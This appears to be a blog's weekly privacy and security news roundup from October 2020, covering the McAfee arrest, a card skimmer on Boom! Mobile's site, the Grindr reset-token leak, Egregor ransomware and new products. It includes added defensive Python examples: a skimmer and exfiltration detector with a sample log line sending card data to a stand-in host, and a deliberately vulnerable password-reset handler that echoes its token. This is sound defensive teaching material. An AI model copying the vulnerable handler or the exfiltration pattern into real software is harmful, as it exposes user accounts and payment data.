Privacy and Security related news for the week ending 2020 10 06

Hey everyone! Welcome to the Privacy and Security related news for the week ending October 6th 2020

From the Wild and crazy guy John McAfee (We’ve met him. We can attest to the “crazy” parts) all the way to Mars, we have you covered with the latest and truly the greatest news.

We know you are going to love this week’s privacy and security news story round up and perhaps even forgive us for the last socially very distanced article.

Stay on point, on guard and informed. Read the article or download the podcast.

…And now our first story:

ES: John McAfee Arrested in Spain and Charged With US Tax Evasion.

An English-American businessman, computer programmer, and political activist, John McAfee founded cybersecurity firm McAfee Associates in 1987 and ran it until 1994. In 2010, the company was sold to Intel.

McAfee has had a contentious association with the law for years, though it’s at times unclear which run-ins are real and what has been fabricated. A former 2020 US Presidential candidate for the Libertarian Party (yes, really), he claimed that the campaign was “in exile” after he was charged with “using Crypto Cuttencies [sic] in criminal acts against the U. S. Government” in January 2019. In that same video, he said he hasn’t paid taxes in eight years. (That will matter later.) He also claimed the CIA had “attempted to collect us” in a July 2019 tweet with a photo of him on a boat holding a gun, part of an adventure that ended in his arrest and release in the Dominican Republic.

A June 15 indictment that was unsealed on Monday alleges that McAfee willfully failed to file tax returns between 2014 and 2018, although he earned millions from “promoting cryptocurrencies, consulting work, speaking engagements, and selling the rights to his life story for a documentary.”

To evade tax liability, the indictment says, McAfee directed the income into the bank accounts and crypto-exchange accounts of nominees. Furthermore, he allegedly concealed assets such as real estate, a yacht, and a vehicle.

The SEC also wants to have McAfee barred from serving as a public company officer and director.

We loved Robert Wood's advice in Forbes with the 7 lessons learned from John McAfee.

1). Report your income and always file. (US citizens always have to file even if dual nationals and making pennies).
2). Be accurate too. False filing is a US felony.
3). Transparency is good, secrecy is bad.
4). Don’t obstruct the IRS.
5). Don’t be willful.
6). Report foreign accounts and assets too.
7). Watch Your Lifestyle.

UN International Maritime Organization says it was hacked

A number of IMO’s web-based services became unavailable on Wednesday 30 September. The systems impacted included the IMO public website and other web-based services. The interruption of web-based services was caused by a sophisticated cyber-attack against the Organization’s IT systems that overcame robust security measures in place.

IMO has ISO/IEC 27001:2013 certification for its information security management system. (So it shows they make an effort as far as security goes.)

The IMO Headquarters file servers are located in the UK, with extensive backup systems in Geneva. The backup and restore system is regularly tested.

Following the attack, the Secretariat shut down key systems to prevent further damage.

Service to the website was restored on Friday, with other services coming back up as soon as it is safe to do so.

Insurance firm Ardonagh Group disabled 200 admin accounts as ransomware infection took hold

Gareth Corfield: Ardonagh spokeswoman Kelly-Ann Knight stated, “The incident was identified as a result of the routine comprehensive monitoring we have in place. We immediately took all necessary action including taking impacted systems offline and have implemented our business continuity plans in the impacted business units, to minimize disruption to our customers. We are working with third-party forensic and IT experts to manage the situation and are in the process of carrying out remedial action.”

Sources said that IT access within the firm has been patchy as internal crisis response teams, along with third-party responders, scrambled to halt the ransomware.

FR: Privacy: Five bar and cafe owners arrested in France for running no-log WiFi networks

Catalin Cimpanu: In one of the weirdest arrests of the year, at least five bar and cafe managers from the French city of Grenoble were taken into custody last week for running open WiFi networks at their establishments and not keeping logs of past connected users.

The bar and cafe owners were arrested for allegedly breaking a 14-year-old French law that dictates that all internet service providers must keep logs on all their users for at least one year.

Nonetheless, French media pointed out that the law’s text didn’t only apply to internet service providers (ISPs) in the broad meaning of the word — as in telecommunications providers — but also to any “persons” who provide internet access, may it be free of charge or via password-protected networks.

The bar and cafe owners were eventually released after questioning.

According to French law number 2006-64, they now risk up to one year in prison, a personal fine of up to €75,000, and a business fine of up to €375,000.

US: Boom! Hacked page on mobile phone website is stealing customers’ card data

Dan Goodin / ARS Technica: If you’re in the market for a new mobile phone plan, it’s best to avoid turning to Boom! Mobile. That is, unless you don’t mind your sensitive payment card data being sent to criminals in an attack that remained ongoing in the last few hours.

According to researchers from security firm Malwarebytes, Boom! Mobile’s website is infected with a malicious script that skims payment card data and sends it to a server under the control of a criminal group researchers have dubbed Fullz House. The malicious script is called by a single line that comprises mostly nonsense characters when viewed with the human eye.

When decoded from Base64 format, the line translates to: paypal-debit[.]com/cdn/ga.js. The JavaScript code ga.js masquerades as a Google Analytics script at one of the many fraudulent domains operated by Fullz House members. “From a network traffic point of view, you can see each leak as a single GET request where the data is Base64 encoded.”

People considering buying a new phone plan should steer clear of Boom!, at least until the skimmer script is removed.

Boom! representatives didn’t respond to messages seeking comment for this post.
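Two defender-side checks that follow from the Malwarebytes description above, as an added example that is not code from the article or from Malwarebytes: the first decodes Base64 string literals found in page source and flags any that resolve to a script URL on a host outside an allowlist (the "single line of nonsense characters" that loads ga.js); the second scans proxy log lines for single GET requests whose query carries Base64 text containing a Luhn-valid card number, which is the exfiltration pattern quoted in the story. The allowlist, the domain skimmer-cdn.invalid, the log lines and the card number are constructed placeholders, not values from the incident.

```python
"""Added example: detect a Base64-obfuscated script loader and Base64 GET exfiltration.
All hosts, log lines and card values are constructed for the demo."""
import base64
import re
from urllib.parse import parse_qs, quote, urlparse

# Hosts this (hypothetical) shop legitimately loads scripts from.
TRUSTED_SCRIPT_HOSTS = {"www.google-analytics.com", "shop.example"}

B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
LOG_LINE = re.compile(r'"GET (\S+) HTTP/[\d.]+"')
CARD_RE = re.compile(r"\b\d{13,19}\b")


def decode_b64_literals(page_source):
    """Return every quoted Base64 literal in the page that decodes to printable ASCII."""
    found = []
    for m in B64_LITERAL.finditer(page_source):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: ignore
        if text.isprintable():
            found.append(text)
    return found


def _host(text):
    """Extract the hostname from a URL that may be scheme-less or protocol-relative."""
    if "://" in text:
        url = text
    elif text.startswith("//"):
        url = "https:" + text
    else:
        url = "https://" + text
    return urlparse(url).hostname


def untrusted_script_urls(page_source):
    """Flag decoded literals that look like a .js URL on a host outside the allowlist."""
    flagged = []
    for text in decode_b64_literals(page_source):
        if not re.search(r"\.js(\?|$)", text):
            continue
        host = _host(text)
        if host and host not in TRUSTED_SCRIPT_HOSTS:
            flagged.append((host, text))
    return flagged


def luhn_ok(digits):
    """Luhn checksum: weeds out random digit runs before treating them as card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def exfil_requests(log_lines):
    """Return (host, masked card) for GET requests whose query decodes to a Luhn-valid number."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        url = urlparse(m.group(1))
        for values in parse_qs(url.query).values():
            for v in values:
                try:
                    decoded = base64.b64decode(v + "=" * (-len(v) % 4)).decode("utf-8", "replace")
                except ValueError:
                    continue
                for num in CARD_RE.findall(decoded):
                    if luhn_ok(num):
                        hits.append((url.hostname, num[:6] + "..." + num[-4:]))
    return hits


# Constructed sample input: a page that decodes a loader URL at runtime, and two proxy log
# lines, the second of which carries a Base64-encoded JSON blob with a test card number.
SAMPLE_PAGE = ('<script>var u=atob("'
               + base64.b64encode(b"//skimmer-cdn.invalid/cdn/ga.js").decode() + '");</script>')
_payload = base64.b64encode(b'{"cc":"4111111111111111","exp":"12/24"}').decode()
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Oct/2020:10:01:02 +0000] "GET https://shop.example/cart HTTP/1.1" 200 512',
    '10.0.0.5 - - [05/Oct/2020:10:01:09 +0000] "GET https://skimmer-cdn.invalid/collect?d='
    + quote(_payload) + ' HTTP/1.1" 200 43',
]

if __name__ == "__main__":
    print("untrusted loaders:", untrusted_script_urls(SAMPLE_PAGE))
    print("exfil requests:", exfil_requests(SAMPLE_LOG))
```

The page-source check is cheap enough to run on every deploy of a checkout page; the log check is a hunting query rather than a real-time control, since legitimate analytics also sends Base64 in GET parameters, which is why it keys on a Luhn-valid number rather than on Base64 alone.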

Has the Apple T2 security chip been jailbroken?

If exploited correctly, the Checkra1n 0.11.0 jailbreaking technique allows users (or attackers) to gain full control over the device: modify core OS behaviour, retrieve sensitive or encrypted data, and even plant malware.

Code is run in the security chip during boot-up, and that, combined with the Checkm8 and Blackbird jailbreaking tools, allows access. “Apple left a debugging interface open in the T2 security chip shipping to customers, allowing anyone to enter Device Firmware Update (DFU) mode without authentication. Using this method, it is possible to create a USB-C cable that can automatically exploit your macOS device on boot.”

This allows access to encrypted data on the device. Our advice: don’t leave your phone unattended, and if you misplace it, do a remote data wipe ASAP.

New Ransomware family: Egregor

Just what we needed, a new class of ransomware, and this one has already been seen at a dozen different companies. It contains anti-analysis techniques such as code obfuscation and packed payloads. In one of its execution stages the payload can only be decrypted if the proper key is entered in the process’s command line. This means the file can’t be analyzed unless someone enters the same command line used to run the payload.

Egregor’s ransom note promises that if the ransom is not paid within three days, the attackers will leak part of the stolen data and alert the victim company’s partners and clients via mass media so they know of the breach.

If ransom is paid, Egregor’s operators claim they will decrypt the files and provide recommendations for securing the company’s network to avoid future attacks, “acting as some sort of black hat pentest team.”


What is Golden?

The intelligent knowledge base.

“Explore the world’s first self-constructing knowledge database built by artificial and human intelligence.”

Golden is a company that wants to ‘map all human knowledge’, and it just raised $14.5 million in a Series A from Andreessen Horowitz, DCVC, and Gigafund.

I tested it to see what it knew about Digital Asset Holdings and it did find Yuval Rooz as the CEO.

Watch this space…

Privacy: Want to check your public Gmail-associated persona? This may help.

GHunt is an OSINT tool to extract information from a Google Account using an email address.

It can currently extract:

Owner’s name
Last time the profile was edited
Google ID
If the account is a Hangouts Bot
Activated Google services (YouTube, Photos, Maps, News360, Hangouts, etc.)
Possible YouTube channel
Possible other usernames
Public photos
Phone models
Phone firmwares
Installed software
Google Maps reviews
Possible physical location

So if you have data floating around, this may provide insight into it and allow you an opportunity to tidy it up.

Facebook is opening its experimental predictions app to all users

Facebook isn’t exactly known for balanced conversations or reliable information, but that’s not stopping it from launching Forecast, a “community for crowdsourced predictions and collective insights.” Forecast will let users ask questions and predict the outcomes. For instance, who will win the 2020 election? Or, will we have a COVID-19 vaccine anytime soon?

Though, for a platform riddled with misinformation, there’s reason to be skeptical. It doesn’t help that the predictions boil down to a binary choice, and there’s speculation that the predictions could reinforce existing beliefs or influence real-world outcomes.

We are on the fence with this one.

Privacy: Kaleido’s Unscreen is dead simple drag-and-drop background removal for video

Devin Coldewey: Removing the background of a video you’ve shot can be a real pain if you don’t have the kind of tools and setup used by professionals — and even then it isn’t as easy as it should be. Kaleido’s one-step background removal tool for images has graduated to full-motion video with the company’s new product, Unscreen.

The service itself is simple enough. You drag a video onto the Unscreen webpage, and a few minutes later (depending on the size and resolution of the content) you get it back, with everything gone but the person or object in the foreground.

Tested on a five-minute, 720p video of a woman with long hair, it finished in about 45 minutes. The end result was good, with the hair nicely preserved and only a handful of small glitches that would be easy to paint out if desired.

One thing Kaleido has been careful to demonstrate — and it’s sad to think that this is a differentiator — is that its products work with people whose skin tone and hair confound other solutions. The bare fact that some background removal processes work better with light-skinned people than dark-skinned, or with straight hair than curly, is a sad indicator of a lack of diversity in the training set that produced those tools.

Kaleido’s Bernhard Holzer told me that this was top of mind from the beginning, and that the team has been careful to assemble training data from all over the world to make sure the product works equally well no matter which country or hemisphere the user is in.

Code-hosting website GitHub is rolling out Code Scanning for both paid and free accounts.

To configure Code Scanning, users must visit the “Security” tab of each repository they want the feature enabled for.

Once vulnerabilities are detected, Code Scanning works by prompting the developer to revise their code.

After months of telling the world there was no breach, it appears BlackBaud had a breach.

BlackBaud, the cloud CRM provider, filed an 8-K form with the US Securities and Exchange Commission on September 29, 2020. The disclosure states: “the cybercriminal may have accessed some unencrypted fields intended for bank account information, social security numbers, usernames and/or passwords.”
“We expect our Security Incident investigation and security enhancements to continue for the foreseeable future.”

Hacking Grindr Accounts with Copy and Paste

To reset a password, Grindr sends the user an email with a clickable link containing an account password reset token. Once clicked, the user can change their password and is allowed back into their account.

But Wassime Bouimadaghene, a French security researcher, found that Grindr’s password reset page was leaking password reset tokens to the browser. That meant anyone who knew a user’s registered email address could trigger the password reset and collect the reset token from the browser, if they knew where to look.

A couple of years ago it made headlines when Grindr was found to be sending HIV status off to third parties and given the sensitivity of this data, rightly so. This, along with many of the other fields above, is what makes it so sensational that the data was so trivially accessible by anyone who could exploit this simple flaw.

The real issue was that for 5 or 6 days, neither Wassime nor Troy Hunt (who Wassime reached out to) got a response, so Troy tweeted about it. From that point the responses were exemplary with the issue fixed forthwith.
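The flaw described above is a server-side one: the reset endpoint handed the token back in its response instead of delivering it only through the registered email address. The following is an added example, not Grindr’s code, contrasting a handler with that defect against a hardened one that responds identically whether or not the address exists, sends the token out-of-band only, stores only a hash of it, and makes it expire and burn on first use. The user table, the in-memory token store and the OUTBOX list standing in for a mail sender are constructed for the demo.

```python
"""Added example: a password-reset handler that echoes the token to the browser
(the defect pattern) beside a hardened version. Data and mail sender are simulated."""
import hashlib
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60

# Constructed user table: email -> account record (password hash omitted for brevity).
USERS = {"alice@example.invalid": {"id": 1}}
# Hash of the reset token -> (email, expiry). Storing a hash means a leaked table is useless.
RESET_TOKENS = {}
# Stand-in for the email sender; in production this is the ONLY place the token goes.
OUTBOX = []


def _hash(token):
    return hashlib.sha256(token.encode()).hexdigest()


def request_reset_vulnerable(email, now=None):
    """Defective pattern: the reset page's JSON response includes the token itself,
    so anyone who can submit the victim's email can read it from the browser."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[_hash(token)] = (email, now + TOKEN_TTL_SECONDS)
    OUTBOX.append((email, token))
    return {"status": "ok", "resetToken": token}  # <-- the leak


def request_reset_hardened(email, now=None):
    """Hardened: token leaves the server only via email; the HTTP response is generic
    and identical for known and unknown addresses (no account enumeration)."""
    now = time.time() if now is None else now
    if email in USERS:
        token = secrets.token_urlsafe(32)
        RESET_TOKENS[_hash(token)] = (email, now + TOKEN_TTL_SECONDS)
        OUTBOX.append((email, token))
    return {"status": "ok",
            "message": "If that address is registered, a reset link has been sent."}


def redeem_token(token, now=None):
    """Exchange a token for the account email it belongs to, or None.
    The token is removed on first use and rejected after expiry."""
    now = time.time() if now is None else now
    entry = RESET_TOKENS.pop(_hash(token), None)  # single use, even if expired
    if entry is None:
        return None
    email, expires_at = entry
    if now > expires_at:
        return None
    return email


if __name__ == "__main__":
    print("vulnerable response:", request_reset_vulnerable("alice@example.invalid"))
    print("hardened response:", request_reset_hardened("alice@example.invalid"))
    print("token delivered by mail only:", OUTBOX[-1])
    print("redeem once:", redeem_token(OUTBOX[-1][1]))
    print("redeem again:", redeem_token(OUTBOX[-1][1]))
```

A review of a reset flow should check all four properties at once: the token appears in no response body, header, redirect URL or client-side script; responses do not reveal whether the address exists; the stored form is a hash; and the token is short-lived and single-use.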

With API attacks rising, Cloudflare launches a free API security tool

By Catalin Cimpanu: Named the Cloudflare API Shield, this new service will be available for free for all Cloudflare account holders, regardless of pricing plan.

APIs, or Application Programming Interfaces, are exactly what their name says they are — interfaces between different applications. They work by receiving instructions or queries from a “client” and performing a pre-defined action.

Cloudflare’s new API Shield works by using a “deny-all” security policy, which the company calls “positive security.”

Once configured for an API server, the API Shield will deny all incoming connections that don’t present a cryptographic certificate and key that the API owner has generated in the API Shield dashboard and installed on all approved client devices, be they mobile apps, IoT devices, web servers, or others.

Working with encryption and certificates sounds complicated, but Cloudflare says this is why it created API Shield in the first place, as a place to automate all these operations as part of a web dashboard.

“We’ll initially support [API] JSON traffic and, based on customer feedback, we will consider extending schema protection to binary protocols, such as gRPC,” Cloudflare said in a press release.

Planned features include rate limiting, DDoS protection, web application rules specifically designed for APIs, and API analytics.

Google intros a couple of useful privacy tools for Android phones.

New feature: “verified calls”

Businesses call millions of consumers every day, but many consumers don’t answer calls unless they recognize the caller. Calls from unverified phone numbers can also cause stress as scam call rates increase.

When participating businesses place calls, Verified Calls establishes trust by confirming the identity of the business in real time so users can be confident that calls aren’t spoofed. Users receive an enhanced experience with the calling business’s name and logo, a verification badge, and the reason for the call, setting the ground for a successful engagement.

Similar to how Verified Calls enhances calling experiences, Verified SMS makes SMS messaging safer and more trustworthy by adding sender verification and branding to business SMS messages.

Many brands—like 1-800-Flowers, Kayak, SoFi and Google Pay—are already sending messages with Verified SMS, and more businesses are signing up to use Verified SMS every day.
(You get a “verified sender badge, business name and logo and link preview”.)

New feature: “Hold for Me”

Sarah Perez: In the short demo of “Hold for Me,” Google showed how a Pixel device owner is able to activate the new feature after they’ve been placed on hold. This is done by tapping a new button that appears on the phone screen above the buttons for muting the call, turning on speakerphone, and the other in-call phone controls.

Once activated, you’re alerted with a message that says “Don’t hang up,” where you’re advised that Google Assistant is listening to the call for you, so you can do other things.

If the party on the other end of the call were to return, they would not hear what you were doing until you resumed the call.

A button is also available on this screen that lets you tap to return to the call at any time, and below that an on-screen message says “music playing” to indicate if the Google Assistant is still hearing the hold music. Real-time captions will appear if there is talking taking place on the line. This is powered by Google’s natural language understanding, the company says.

You can also choose to press the red hang up button to end the call from this screen.

When a person comes on the line, the device will alert you it’s time to return to the call.

At a time when people are waiting on hold for hours for help with COVID-19 related government assistance, like unemployment benefits, a “Hold for Me” option could be more than a useful new feature — it could be a literal lifesaver for those in the middle of a financial crisis due to job loss.

Google says the new feature will come to its new Pixel 5 devices, which will soon be followed by its older-generation Pixel phones via the next “Pixel feature drop” roll out.

Privacy: Amazon One—a new “innovation” to make everyday activities "effortless"

Dilip Kumar: customers can use Amazon One as an entry option at two of our Amazon Go stores in Seattle—our original Amazon Go store at 7th & Blanchard as well as our store in South Lake Union at 300 Boren Ave. North.

It takes less than a minute to sign up at these Amazon Go stores using an Amazon One device. The first step is to insert your credit card. Next, hover your palm over the device and follow the prompts to associate that card with the unique palm signature being built for you by our computer vision technology in real time. You’ll have the option to enroll with just one palm or both. And that’s it—you’re now signed up. Once you’re enrolled, to use Amazon One to enter these Amazon Go stores, you’ll just hold your palm above the Amazon One device at entry for about a second or so.

We also plan to offer the service to third parties like retailers, stadiums, and office buildings so that more people can benefit from this ease and convenience in more places.

Why did you create Amazon One?
As with everything Amazon does, we started with the customer experience and worked backwards. We solved for things that are durable and have stood the test of time but often cause friction or wasted time for customers. We wondered whether we could help improve experiences like paying at checkout, presenting a loyalty card, entering a location like a stadium, or even badging into work. So, we built Amazon One to offer just that—a quick, reliable, and secure way for people to identify themselves or authorize a transaction while moving seamlessly through their day.

Why did you pick palm recognition?
We selected palm recognition for a few important reasons. One reason was that palm recognition is considered more private than some biometric alternatives because you can’t determine a person’s identity by looking at an image of their palm. It also requires someone to make an intentional gesture by holding their palm over the device to use. And it’s contactless, which we think customers will appreciate, especially in current times. Ultimately, using a palm as a biometric identifier puts customers in control of when and where they use the service.

Is an Amazon account required?
We designed the signup experience to be fast and lightweight, and you don’t need an Amazon account to sign up or start using Amazon One—just a mobile phone number and credit card. But if you choose to use your Amazon account with Amazon One, you can log in on our website to securely manage your information and see your usage history.

What is the device actually scanning when it creates my unique palm signature?
When you hold your palm over the Amazon One device, the technology evaluates multiple aspects of your palm. No two palms are alike, so we analyze all these aspects with our vision technology and select the most distinct identifiers on your palm to create your palm signature.

How do you protect customer data?
At Amazon, nothing is more important to us than earning and maintaining customer trust. We take data security and privacy seriously, and any sensitive data is treated in accordance with our long-standing policies. With this in mind, we designed Amazon One to be highly secure. For example, the Amazon One device is protected by multiple security controls and palm images are never stored on the Amazon One device. Rather, the images are encrypted and sent to a highly secure area we custom-built in the cloud where we create your palm signature.

If I decide I don’t want to use Amazon One any more after signing up, can I delete my biometric data?
Yes, you can request to delete data associated with Amazon One through the device itself or via the online customer portal.

…forgive us for wondering how long until the database of palm prints is hacked. :wink:

And our last story is neither security nor privacy, unless you really stretch the definition of privacy.

In the midst of social distancing, Mars Is The Closest to Earth It’ll Be For Another 15 Years

JACINTA BOWLER: Very soon, Mars is not just going to be close to our hearts, but also nearest to our actual planet - a mere 62.1 million kilometers (38.6 million miles) away from Earth.

This is the closest it’ll be for the next 15 years. And it means that stargazing is highly recommended as Mars will be bright, big and easy to see with or without a telescope.

We’d recommend checking out a sky chart to work out where Mars will be in the night sky in your location so you can plan for the best viewing.

And that’s it for this week DAML’ers! Stay safe and secure!
